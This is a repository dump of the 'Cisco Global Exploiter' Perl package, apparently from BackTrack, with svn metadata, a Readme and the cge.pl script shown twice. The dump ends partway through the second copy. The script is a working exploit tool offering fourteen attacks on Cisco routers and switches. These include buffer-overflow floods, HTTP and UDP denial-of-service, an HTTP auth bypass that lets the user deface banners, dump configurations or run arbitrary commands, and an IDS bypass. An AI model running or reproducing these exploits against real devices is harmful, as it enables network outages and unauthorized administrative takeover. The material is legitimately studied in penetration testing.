├── .svn ├── entries ├── prop-base │ └── cge.pl.svn-base └── text-base │ ├── Readme.svn-base │ └── cge.pl.svn-base ├── Readme ├── cge.pl ├── debian ├── changelog ├── cisco-global-exploiter.install ├── compat ├── control ├── copyright ├── docs ├── rules └── source │ └── format └── doc ├── .svn ├── entries └── text-base │ ├── Changelog.svn-base │ └── Documentation.svn-base ├── Changelog └── Documentation /.svn/entries: -------------------------------------------------------------------------------- 1 | 10 2 | 3 | dir 4 | 1733 5 | svn+ssh://dookie@10.0.0.12/var/svn/backtrack/microverse/c/cisco-global-exploiter/source-cisco-global-exploiter-13-bt1/var/backtrack/sources/cisco-global-exploiter/13/bt1/upstream-sources/cisco-global-exploiter 6 | svn+ssh://dookie@10.0.0.12/var/svn/backtrack 7 | 8 | 9 | 10 | 2011-04-18T09:02:05.482722Z 11 | 327 12 | emgent 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | d9273255-a111-4fa6-bf0a-919607b5ba98 28 | 29 | doc 30 | dir 31 | 32 | cge.pl 33 | file 34 | 35 | 36 | 37 | 38 | 2011-08-26T04:18:02.530184Z 39 | 6666f045723fb94649d52029e444f515 40 | 2011-04-18T09:02:05.482722Z 41 | 327 42 | emgent 43 | has-props 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 17970 65 | 66 | Readme 67 | file 68 | 69 | 70 | 71 | 72 | 2011-08-26T04:18:02.530184Z 73 | 4983346dcffbc0274a162a5776975971 74 | 2011-04-18T09:02:05.482722Z 75 | 327 76 | emgent 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 872 99 | 100 | -------------------------------------------------------------------------------- /.svn/prop-base/cge.pl.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /.svn/text-base/Readme.svn-base: -------------------------------------------------------------------------------- 1 | 2 | ## 3 | # Cisco Global Exploiter 4 | # 5 | # Legal notes : 6 | # The BlackAngels staff refuse all responsabilities 7 | # for an incorrect or illegal use of this software 8 | # or for eventual damages to others systems. 9 | # 10 | # http://www.blackangels.it 11 | ## 12 | 13 | 14 | 15 | Project's maintainers : 16 | Nemesis (nemesis[at]blackangels.it) 17 | E4m (e4m[at]blackangels.it) 18 | 19 | What is Cisco Global Exploiter : 20 | Cisco Global Exploiter (CGE), is an advanced, simple and fast security 21 | testing tool, that is able to exploit the most dangerous vulnerabilities 22 | of Cisco systems. 23 | 24 | How CGE works : 25 | CGE has an intuitive and simple user interface and it is executable from 26 | commands line, by inputting two simple parameters, like the target and the 27 | vulnerability to exploit. 28 | 29 | For more informations or a detailed description of all vulnerabilities 30 | and of their exploiting, read /doc/documentation. -------------------------------------------------------------------------------- /.svn/text-base/cge.pl.svn-base: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | ## 4 | # Cisco Global Exploiter 5 | # 6 | # Legal notes : 7 | # The BlackAngels staff refuse all responsabilities 8 | # for an incorrect or illegal use of this software 9 | # or for eventual damages to others systems. 10 | # 11 | # http://www.blackangels.it 12 | ## 13 | 14 | 15 | 16 | ## 17 | # Modules 18 | ## 19 | 20 | use Socket; 21 | use IO::Socket; 22 | 23 | 24 | ## 25 | # Main 26 | ## 27 | 28 | $host = ""; 29 | $expvuln = ""; 30 | $host = @ARGV[ 0 ]; 31 | $expvuln = @ARGV[ 1 ]; 32 | 33 | if ($host eq "") { 34 | usage(); 35 | } 36 | if ($expvuln eq "") { 37 | usage(); 38 | } 39 | if ($expvuln eq "1") { 40 | cisco1(); 41 | } 42 | elsif ($expvuln eq "2") { 43 | cisco2(); 44 | } 45 | elsif ($expvuln eq "3") { 46 | cisco3(); 47 | } 48 | elsif ($expvuln eq "4") { 49 | cisco4(); 50 | } 51 | elsif ($expvuln eq "5") { 52 | cisco5(); 53 | } 54 | elsif ($expvuln eq "6") { 55 | cisco6(); 56 | } 57 | elsif ($expvuln eq "7") { 58 | cisco7(); 59 | } 60 | elsif ($expvuln eq "8") { 61 | cisco8(); 62 | } 63 | elsif ($expvuln eq "9") { 64 | cisco9(); 65 | } 66 | elsif ($expvuln eq "10") { 67 | cisco10(); 68 | } 69 | elsif ($expvuln eq "11") { 70 | cisco11(); 71 | } 72 | elsif ($expvuln eq "12") { 73 | cisco12(); 74 | } 75 | elsif ($expvuln eq "13") { 76 | cisco13(); 77 | } 78 | elsif ($expvuln eq "14") { 79 | cisco14(); 80 | } 81 | else { 82 | printf "\nInvalid vulnerability number ...\n\n"; 83 | exit(1); 84 | } 85 | 86 | 87 | ## 88 | # Functions 89 | ## 90 | 91 | sub usage 92 | { 93 | printf "\nUsage :\n"; 94 | printf "perl cge.pl \n\n"; 95 | printf "Vulnerabilities list :\n"; 96 | printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n"; 97 | printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n"; 98 | printf "[3] - Cisco IOS HTTP Auth Vulnerability\n"; 99 | printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n"; 100 | printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n"; 101 | printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n"; 102 | printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n"; 103 | printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n"; 104 | printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n"; 105 | printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n"; 106 | printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n"; 107 | printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n"; 108 | printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n"; 109 | printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n"; 110 | exit(1); 111 | } 112 | 113 | sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability 114 | { 115 | my $serv = $host; 116 | my $dch = "?????????????????a~ %%%%%XX%%%%%"; 117 | my $num = 30000; 118 | my $string .= $dch x $num; 119 | my $shc="\015\012"; 120 | 121 | my $sockd = IO::Socket::INET->new ( 122 | Proto => "tcp", 123 | PeerAddr => $serv, 124 | PeerPort => "(23)", 125 | ) || die("No telnet server detected on $serv ...\n\n"); 126 | 127 | $sockd->autoflush(1); 128 | print $sockd "$string". $shc; 129 | while (<$sockd>){ print } 130 | print("\nPacket sent ...\n"); 131 | sleep(1); 132 | print("Now checking server's status ...\n"); 133 | sleep(2); 134 | 135 | my $sockd2 = IO::Socket::INET->new ( 136 | Proto => "tcp", 137 | PeerAddr => $serv, 138 | PeerPort => "(23)", 139 | ) || die("Vulnerability successful exploited. Target server is down ...\n\n"); 140 | 141 | print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); 142 | close($sockd2); 143 | exit(1); 144 | } 145 | 146 | sub cisco2 # Cisco IOS Router Denial of Service Vulnerability 147 | { 148 | my $serv = $host; 149 | 150 | my $sockd = IO::Socket::INET->new ( 151 | Proto=>"tcp", 152 | PeerAddr=>$serv, 153 | PeerPort=>"http(80)",); 154 | unless ($sockd){die "No http server detected on $serv ...\n\n"}; 155 | $sockd->autoflush(1); 156 | print $sockd "GET /\%\% HTTP/1.0\n\n"; 157 | -close $sockd; 158 | print "Packet sent ...\n"; 159 | sleep(1); 160 | print("Now checking server's status ...\n"); 161 | sleep(2); 162 | 163 | my $sockd2 = IO::Socket::INET->new ( 164 | Proto=>"tcp", 165 | PeerAddr=>$serv, 166 | PeerPort=>"http(80)",); 167 | unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; 168 | 169 | print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); 170 | close($sockd2); 171 | exit(1); 172 | } 173 | 174 | sub cisco3 # Cisco IOS HTTP Auth Vulnerability 175 | { 176 | my $serv= $host; 177 | my $n=16; 178 | my $port=80; 179 | my $target = inet_aton($serv); 180 | my $fg = 0; 181 | 182 | LAB: while ($n<100) { 183 | my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n"); 184 | $n++; 185 | foreach $line (@results){ 186 | $line=~ tr/A-Z/a-z/; 187 | if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;} 188 | if ($line =~ /http\/1\.0 200 ok/) {$fg=0;} 189 | } 190 | 191 | if ($fg==1) { 192 | sleep(2); 193 | print "Vulnerability unsuccessful exploited ...\n\n"; 194 | } 195 | else { 196 | sleep(2); 197 | print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n"; 198 | last LAB; 199 | } 200 | 201 | sub exploit { 202 | my ($pstr)=@_; 203 | socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || 204 | die("Unable to initialize socket ...\n\n"); 205 | if(connect(S,pack "SnA4x8",2,$port,$target)){ 206 | my @in; 207 | select(S); 208 | $|=1; 209 | print $pstr; 210 | while(){ push @in, $_;} 211 | select(STDOUT); close(S); return @in; 212 | } 213 | else { die("No http server detected on $serv ...\n\n"); } 214 | } 215 | } 216 | exit(1); 217 | } 218 | 219 | sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability 220 | { 221 | my $serv = $host; 222 | my $n = 16; 223 | 224 | while ($n <100) { 225 | exploit1("GET /level/$n/exec/- HTTP/1.0\n\n"); 226 | $wr =~ s/\n//g; 227 | if ($wr =~ /200 ok/) { 228 | while(1) 229 | { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n"; 230 | print "[1] Banner change\n"; 231 | print "[2] List vty 0 4 acl info\n"; 232 | print "[3] Other\n"; 233 | print "Enter a valid option [ 1 - 2 - 3 ] : "; 234 | $vuln = ; 235 | chomp($vuln); 236 | 237 | if ($vuln == 1) { 238 | print "\nEnter deface line : "; 239 | $vuln = ; 240 | chomp($vuln); 241 | exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n"); 242 | } 243 | elsif ($vuln == 2) { 244 | exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n"); 245 | print "$wrf"; 246 | } 247 | elsif ($vuln == 3) 248 | { print "\nEnter attack URL : "; 249 | $vuln = ; 250 | chomp($vuln); 251 | exploit1("GET /$vuln HTTP/1.0\n\n"); 252 | print "$wrf"; 253 | } 254 | } 255 | } 256 | $wr = ""; 257 | $n++; 258 | } 259 | die "Vulnerability unsuccessful exploited ...\n\n"; 260 | 261 | sub exploit1 { 262 | my $sockd = IO::Socket::INET -> new ( 263 | Proto => 'tcp', 264 | PeerAddr => $serv, 265 | PeerPort => 80, 266 | Type => SOCK_STREAM, 267 | Timeout => 5); 268 | unless($sockd){die "No http server detected on $serv ...\n\n"} 269 | $sockd->autoflush(1); 270 | $sockd -> send($_[0]); 271 | while(<$sockd>){$wr .= $_} $wrf = $wr; 272 | close $sockd; 273 | } 274 | exit(1); 275 | } 276 | 277 | sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability 278 | { 279 | my $serv = $host; 280 | my $port = 22; 281 | my $vuln = "a%a%a%a%a%a%a%"; 282 | 283 | my $sockd = IO::Socket::INET->new ( 284 | PeerAddr => $serv, 285 | PeerPort => $port, 286 | Proto => "tcp") 287 | || die "No ssh server detected on $serv ...\n\n"; 288 | 289 | print "Packet sent ...\n"; 290 | print $sockd "$vuln"; 291 | close($sockd); 292 | exit(1); 293 | } 294 | 295 | sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability 296 | { 297 | my $serv = $host; 298 | my $port = 80; 299 | my $vuln = "GET ? HTTP/1.0\n\n"; 300 | 301 | my $sockd = IO::Socket::INET->new ( 302 | PeerAddr => $serv, 303 | PeerPort => $port, 304 | Proto => "tcp") 305 | || die "No http server detected on $serv ...\n\n"; 306 | 307 | print "Packet sent ...\n"; 308 | print $sockd "$vuln"; 309 | sleep(2); 310 | print "\nServer response :\n\n"; 311 | close($sockd); 312 | exit(1); 313 | } 314 | 315 | sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability 316 | { 317 | my $serv = $host; 318 | my $port = 80; 319 | my $k = ""; 320 | 321 | print "Enter a file to read [ /show/config/cr set as default ] : "; 322 | $k = ; 323 | chomp ($k); 324 | if ($k eq "") 325 | {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";} 326 | else 327 | {$vuln = "GET /exec$k HTTP/1.0\n\n";} 328 | 329 | my $sockd = IO::Socket::INET->new ( 330 | PeerAddr => $serv, 331 | PeerPort => $port, 332 | Proto => "tcp") 333 | || die "No http server detected on $serv ...\n\n"; 334 | 335 | print "Packet sent ...\n"; 336 | print $sockd "$vuln"; 337 | sleep(2); 338 | print "\nServer response :\n\n"; 339 | while (<$sockd>){print} 340 | close($sockd); 341 | exit(1); 342 | } 343 | 344 | sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability 345 | { 346 | my $serv = $host; 347 | my $port = 80; 348 | my $vuln = "GET /error?/ HTTP/1.0\n\n"; 349 | 350 | my $sockd = IO::Socket::INET->new ( 351 | PeerAddr => $serv, 352 | PeerPort => $port, 353 | Proto => "tcp") 354 | || die "No http server detected on $serv ...\n\n"; 355 | 356 | print "Packet sent ...\n"; 357 | print $sockd "$vuln"; 358 | sleep(2); 359 | print "\nServer response :\n\n"; 360 | while (<$sockd>){print} 361 | close($sockd); 362 | exit(1); 363 | } 364 | 365 | sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability 366 | { 367 | my $ip = $host; 368 | my $port = "514"; 369 | my $ports = ""; 370 | my $size = ""; 371 | my $i = ""; 372 | my $string = "%%%%%XX%%%%%"; 373 | 374 | print "Input packets size : "; 375 | $size = ; 376 | chomp($size); 377 | 378 | socket(SS, PF_INET, SOCK_DGRAM, 17); 379 | my $iaddr = inet_aton("$ip"); 380 | 381 | for ($i=0; $i<10000; $i++) 382 | { send(SS, $string, $size, sockaddr_in($port, $iaddr)); } 383 | 384 | printf "\nPackets sent ...\n"; 385 | sleep(2); 386 | printf "Please enter a server's open port : "; 387 | $ports = ; 388 | chomp $ports; 389 | printf "\nNow checking server status ...\n"; 390 | sleep(2); 391 | 392 | socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n"; 393 | my $dest = sockaddr_in ($ports, inet_aton($ip)); 394 | connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n"; 395 | 396 | printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n"; 397 | exit(1); 398 | } 399 | 400 | sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability 401 | { 402 | my $ip = $host; 403 | my $vln = "%%%%%XX%%%%%"; 404 | my $num = 30000; 405 | my $string .= $vln x $num; 406 | my $shc="\015\012"; 407 | 408 | my $sockd = IO::Socket::INET->new ( 409 | Proto => "tcp", 410 | PeerAddr => $ip, 411 | PeerPort => "(2002)", 412 | ) || die "Unable to connect to $ip:2002 ...\n\n"; 413 | 414 | $sockd->autoflush(1); 415 | print $sockd "$string" . $shc; 416 | while (<$sockd>){ print } 417 | print "Packet sent ...\n"; 418 | close($sockd); 419 | sleep(1); 420 | print("Now checking server's status ...\n"); 421 | sleep(2); 422 | 423 | my $sockd2 = IO::Socket::INET->new ( 424 | Proto=>"tcp", 425 | PeerAddr=>$ip, 426 | PeerPort=>"(2002)",); 427 | unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"}; 428 | 429 | print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); 430 | exit(1); 431 | } 432 | 433 | sub cisco11 # Cisco Catalyst Memory Leak Vulnerability 434 | { 435 | my $serv = $host; 436 | my $rep = ""; 437 | my $str = "AAA\n"; 438 | 439 | print "\nInput the number of repetitions : "; 440 | $rep = ; 441 | chomp $rep; 442 | 443 | my $sockd = IO::Socket::INET->new ( 444 | PeerAddr => $serv, 445 | PeerPort => "(23)", 446 | Proto => "tcp") 447 | || die "No telnet server detected on $serv ...\n\n"; 448 | 449 | for ($k=0; $k<=$rep; $k++) { 450 | print $sockd "$str"; 451 | sleep(1); 452 | print $sockd "$str"; 453 | sleep(1); 454 | } 455 | close($sockd); 456 | print "Packet sent ...\n"; 457 | sleep(1); 458 | print("Now checking server's status ...\n"); 459 | sleep(2); 460 | 461 | my $sockd2 = IO::Socket::INET->new ( 462 | Proto=>"tcp", 463 | PeerAddr=>$serv, 464 | PeerPort=>"(23)",); 465 | unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; 466 | 467 | print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n"; 468 | close($sockd2); 469 | exit(1); 470 | } 471 | 472 | sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability 473 | { 474 | my $serv = $host; 475 | my $l =100; 476 | my $vuln = ""; 477 | my $long = "A" x $l; 478 | 479 | my $sockd = IO::Socket::INET->new ( 480 | PeerAddr => $serv, 481 | PeerPort => "(80)", 482 | Proto => "tcp") 483 | || die "No http server detected on $serv ...\n\n"; 484 | 485 | for ($k=0; $k<=50; $k++) { 486 | my $vuln = "GET " . $long . " HTTP/1.0\n\n"; 487 | print $sockd "$vuln\n\n"; 488 | sleep(1); 489 | $l = $l + 100; 490 | } 491 | 492 | close($sockd); 493 | print "Packet sent ...\n"; 494 | sleep(1); 495 | print("Now checking server's status ...\n"); 496 | sleep(2); 497 | 498 | my $sockd2 = IO::Socket::INET->new ( 499 | Proto=>"tcp", 500 | PeerAddr=>$serv, 501 | PeerPort=>"http(80)",); 502 | unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; 503 | 504 | print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n"; 505 | close($sockd2); 506 | exit(1); 507 | } 508 | 509 | sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF) 510 | { 511 | my $serv = $host; 512 | my $vuln = "GET %u002F HTTP/1.0\n\n"; 513 | 514 | my $sockd = IO::Socket::INET->new ( 515 | PeerAddr => $serv, 516 | PeerPort => "(80)", 517 | Proto => "tcp") 518 | || die "No http server detected on $serv ...\n\n"; 519 | 520 | print "Packet sent ...\n"; 521 | print $sockd "$vuln"; 522 | close($sockd); 523 | sleep(1); 524 | print("Now checking server's status ...\n"); 525 | print("Please verify if directory has been listed ...\n\n"); 526 | print("Server response :\n"); 527 | sleep(2); 528 | while (<$sockd>){ print } 529 | exit(1); 530 | } 531 | 532 | sub cisco14 # Cisco IOS HTTP server DoS Vulnerability 533 | { 534 | my $serv = $host; 535 | my $vuln = "GET /TEST?/ HTTP/1.0"; 536 | 537 | my $sockd = IO::Socket::INET->new ( 538 | Proto=>"tcp", 539 | PeerAddr=>$serv, 540 | PeerPort=>"http(80)",); 541 | unless ($sockd){die "No http server detected on $serv ...\n\n"}; 542 | 543 | print $sockd "$vuln\n\n"; 544 | print "Packet sent ...\n"; 545 | close($sockd); 546 | sleep(1); 547 | print("Now checking server's status ...\n"); 548 | sleep(2); 549 | 550 | my $sockd2 = IO::Socket::INET->new ( 551 | Proto=>"tcp", 552 | PeerAddr=>$serv, 553 | PeerPort=>"http(80)",); 554 | unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; 555 | 556 | print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); 557 | close($sockd2); 558 | exit(1); 559 | } -------------------------------------------------------------------------------- /Readme: -------------------------------------------------------------------------------- 1 | 2 | ## 3 | # Cisco Global Exploiter 4 | # 5 | # Legal notes : 6 | # The BlackAngels staff refuse all responsabilities 7 | # for an incorrect or illegal use of this software 8 | # or for eventual damages to others systems. 9 | # 10 | # http://www.blackangels.it 11 | ## 12 | 13 | 14 | 15 | Project's maintainers : 16 | Nemesis (nemesis[at]blackangels.it) 17 | E4m (e4m[at]blackangels.it) 18 | 19 | What is Cisco Global Exploiter : 20 | Cisco Global Exploiter (CGE), is an advanced, simple and fast security 21 | testing tool, that is able to exploit the most dangerous vulnerabilities 22 | of Cisco systems. 23 | 24 | How CGE works : 25 | CGE has an intuitive and simple user interface and it is executable from 26 | commands line, by inputting two simple parameters, like the target and the 27 | vulnerability to exploit. 28 | 29 | For more informations or a detailed description of all vulnerabilities 30 | and of their exploiting, read /doc/documentation. -------------------------------------------------------------------------------- /cge.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | ## 4 | # Cisco Global Exploiter 5 | # 6 | # Legal notes : 7 | # The BlackAngels staff refuse all responsabilities 8 | # for an incorrect or illegal use of this software 9 | # or for eventual damages to others systems. 10 | # 11 | # http://www.blackangels.it 12 | ## 13 | 14 | 15 | 16 | ## 17 | # Modules 18 | ## 19 | 20 | use Socket; 21 | use IO::Socket; 22 | 23 | 24 | ## 25 | # Main 26 | ## 27 | 28 | $host = ""; 29 | $expvuln = ""; 30 | $host = @ARGV[ 0 ]; 31 | $expvuln = @ARGV[ 1 ]; 32 | 33 | if ($host eq "") { 34 | usage(); 35 | } 36 | if ($expvuln eq "") { 37 | usage(); 38 | } 39 | if ($expvuln eq "1") { 40 | cisco1(); 41 | } 42 | elsif ($expvuln eq "2") { 43 | cisco2(); 44 | } 45 | elsif ($expvuln eq "3") { 46 | cisco3(); 47 | } 48 | elsif ($expvuln eq "4") { 49 | cisco4(); 50 | } 51 | elsif ($expvuln eq "5") { 52 | cisco5(); 53 | } 54 | elsif ($expvuln eq "6") { 55 | cisco6(); 56 | } 57 | elsif ($expvuln eq "7") { 58 | cisco7(); 59 | } 60 | elsif ($expvuln eq "8") { 61 | cisco8(); 62 | } 63 | elsif ($expvuln eq "9") { 64 | cisco9(); 65 | } 66 | elsif ($expvuln eq "10") { 67 | cisco10(); 68 | } 69 | elsif ($expvuln eq "11") { 70 | cisco11(); 71 | } 72 | elsif ($expvuln eq "12") { 73 | cisco12(); 74 | } 75 | elsif ($expvuln eq "13") { 76 | cisco13(); 77 | } 78 | elsif ($expvuln eq "14") { 79 | cisco14(); 80 | } 81 | else { 82 | printf "\nInvalid vulnerability number ...\n\n"; 83 | exit(1); 84 | } 85 | 86 | 87 | ## 88 | # Functions 89 | ## 90 | 91 | sub usage 92 | { 93 | printf "\nUsage :\n"; 94 | printf "perl cge.pl \n\n"; 95 | printf "Vulnerabilities list :\n"; 96 | printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n"; 97 | printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n"; 98 | printf "[3] - Cisco IOS HTTP Auth Vulnerability\n"; 99 | printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n"; 100 | printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n"; 101 | printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n"; 102 | printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n"; 103 | printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n"; 104 | printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n"; 105 | printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n"; 106 | printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n"; 107 | printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n"; 108 | printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n"; 109 | printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n"; 110 | exit(1); 111 | } 112 | 113 | sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability 114 | { 115 | my $serv = $host; 116 | my $dch = "?????????????????a~ %%%%%XX%%%%%"; 117 | my $num = 30000; 118 | my $string .= $dch x $num; 119 | my $shc="\015\012"; 120 | 121 | my $sockd = IO::Socket::INET->new ( 122 | Proto => "tcp", 123 | PeerAddr => $serv, 124 | PeerPort => "(23)", 125 | ) || die("No telnet server detected on $serv ...\n\n"); 126 | 127 | $sockd->autoflush(1); 128 | print $sockd "$string". $shc; 129 | while (<$sockd>){ print } 130 | print("\nPacket sent ...\n"); 131 | sleep(1); 132 | print("Now checking server's status ...\n"); 133 | sleep(2); 134 | 135 | my $sockd2 = IO::Socket::INET->new ( 136 | Proto => "tcp", 137 | PeerAddr => $serv, 138 | PeerPort => "(23)", 139 | ) || die("Vulnerability successful exploited. Target server is down ...\n\n"); 140 | 141 | print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); 142 | close($sockd2); 143 | exit(1); 144 | } 145 | 146 | sub cisco2 # Cisco IOS Router Denial of Service Vulnerability 147 | { 148 | my $serv = $host; 149 | 150 | my $sockd = IO::Socket::INET->new ( 151 | Proto=>"tcp", 152 | PeerAddr=>$serv, 153 | PeerPort=>"http(80)",); 154 | unless ($sockd){die "No http server detected on $serv ...\n\n"}; 155 | $sockd->autoflush(1); 156 | print $sockd "GET /\%\% HTTP/1.0\n\n"; 157 | -close $sockd; 158 | print "Packet sent ...\n"; 159 | sleep(1); 160 | print("Now checking server's status ...\n"); 161 | sleep(2); 162 | 163 | my $sockd2 = IO::Socket::INET->new ( 164 | Proto=>"tcp", 165 | PeerAddr=>$serv, 166 | PeerPort=>"http(80)",); 167 | unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; 168 | 169 | print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); 170 | close($sockd2); 171 | exit(1); 172 | } 173 | 174 | sub cisco3 # Cisco IOS HTTP Auth Vulnerability 175 | { 176 | my $serv= $host; 177 | my $n=16; 178 | my $port=80; 179 | my $target = inet_aton($serv); 180 | my $fg = 0; 181 | 182 | LAB: while ($n<100) { 183 | my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n"); 184 | $n++; 185 | foreach $line (@results){ 186 | $line=~ tr/A-Z/a-z/; 187 | if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;} 188 | if ($line =~ /http\/1\.0 200 ok/) {$fg=0;} 189 | } 190 | 191 | if ($fg==1) { 192 | sleep(2); 193 | print "Vulnerability unsuccessful exploited ...\n\n"; 194 | } 195 | else { 196 | sleep(2); 197 | print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n"; 198 | last LAB; 199 | } 200 | 201 | sub exploit { 202 | my ($pstr)=@_; 203 | socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || 204 | die("Unable to initialize socket ...\n\n"); 205 | if(connect(S,pack "SnA4x8",2,$port,$target)){ 206 | my @in; 207 | select(S); 208 | $|=1; 209 | print $pstr; 210 | while(){ push @in, $_;} 211 | select(STDOUT); close(S); return @in; 212 | } 213 | else { die("No http server detected on $serv ...\n\n"); } 214 | } 215 | } 216 | exit(1); 217 | } 218 | 219 | sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability 220 | { 221 | my $serv = $host; 222 | my $n = 16; 223 | 224 | while ($n <100) { 225 | exploit1("GET /level/$n/exec/- HTTP/1.0\n\n"); 226 | $wr =~ s/\n//g; 227 | if ($wr =~ /200 ok/) { 228 | while(1) 229 | { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n"; 230 | print "[1] Banner change\n"; 231 | print "[2] List vty 0 4 acl info\n"; 232 | print "[3] Other\n"; 233 | print "Enter a valid option [ 1 - 2 - 3 ] : "; 234 | $vuln = ; 235 | chomp($vuln); 236 | 237 | if ($vuln == 1) { 238 | print "\nEnter deface line : "; 239 | $vuln = ; 240 | chomp($vuln); 241 | exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n"); 242 | } 243 | elsif ($vuln == 2) { 244 | exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n"); 245 | print "$wrf"; 246 | } 247 | elsif ($vuln == 3) 248 | { print "\nEnter attack URL : "; 249 | $vuln = ; 250 | chomp($vuln); 251 | exploit1("GET /$vuln HTTP/1.0\n\n"); 252 | print "$wrf"; 253 | } 254 | } 255 | } 256 | $wr = ""; 257 | $n++; 258 | } 259 | die "Vulnerability unsuccessful exploited ...\n\n"; 260 | 261 | sub exploit1 { 262 | my $sockd = IO::Socket::INET -> new ( 263 | Proto => 'tcp', 264 | PeerAddr => $serv, 265 | PeerPort => 80, 266 | Type => SOCK_STREAM, 267 | Timeout => 5); 268 | unless($sockd){die "No http server detected on $serv ...\n\n"} 269 | $sockd->autoflush(1); 270 | $sockd -> send($_[0]); 271 | while(<$sockd>){$wr .= $_} $wrf = $wr; 272 | close $sockd; 273 | } 274 | exit(1); 275 | } 276 | 277 | sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability 278 | { 279 | my $serv = $host; 280 | my $port = 22; 281 | my $vuln = "a%a%a%a%a%a%a%"; 282 | 283 | my $sockd = IO::Socket::INET->new ( 284 | PeerAddr => $serv, 285 | PeerPort => $port, 286 | Proto => "tcp") 287 | || die "No ssh server detected on $serv ...\n\n"; 288 | 289 | print "Packet sent ...\n"; 290 | print $sockd "$vuln"; 291 | close($sockd); 292 | exit(1); 293 | } 294 | 295 | sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability 296 | { 297 | my $serv = $host; 298 | my $port = 80; 299 | my $vuln = "GET ? HTTP/1.0\n\n"; 300 | 301 | my $sockd = IO::Socket::INET->new ( 302 | PeerAddr => $serv, 303 | PeerPort => $port, 304 | Proto => "tcp") 305 | || die 